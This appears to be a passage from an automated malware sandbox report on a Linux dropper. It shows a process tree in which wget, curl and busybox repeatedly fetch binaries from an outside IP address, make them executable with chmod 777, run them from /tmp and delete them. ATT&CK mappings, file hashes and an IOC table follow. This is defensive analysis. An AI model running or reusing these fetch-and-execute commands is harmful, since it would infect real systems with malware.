  ./NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Executes dropped EXE
  PID:1659
- /bin/rm
  rm NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:1660
- /usr/bin/wget
  wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:1661
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Writes file to tmp directory
  PID:1662
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:1663
- /bin/chmod
  chmod 777 FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - File and Directory Permissions Modification
  PID:1664
- /tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  ./FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Executes dropped EXE
  PID:1665
- /bin/rm
  rm FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:1666
- /usr/bin/wget
  wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:1667
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Writes file to tmp directory
  PID:1668
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:1669
- /bin/chmod
  chmod 777 c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - File and Directory Permissions Modification
  PID:1670
- /tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  ./c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Executes dropped EXE
  PID:1671
- /bin/rm
  rm c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:1672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm

Filesize
176B

MD5
e1732e70f015e99d14dff1eeeaec9966

SHA1
c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113

SHA256
6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e

SHA512
6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Download Submit

ioc	pid	Process
/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	1507	HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	1513	EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	1519	UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	1526	2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	1532	urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	1538	A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	1544	I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	1550	DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	1556	NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	1562	FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	1568	c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	1574	GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	1580	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	1586	HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	1592	HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	1598	EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	1604	UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	1611	HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	1617	I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	1623	DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	1629	2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	1635	urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	1641	A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	1647	GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	1653	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	1659	NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	1665	FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	1671	c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr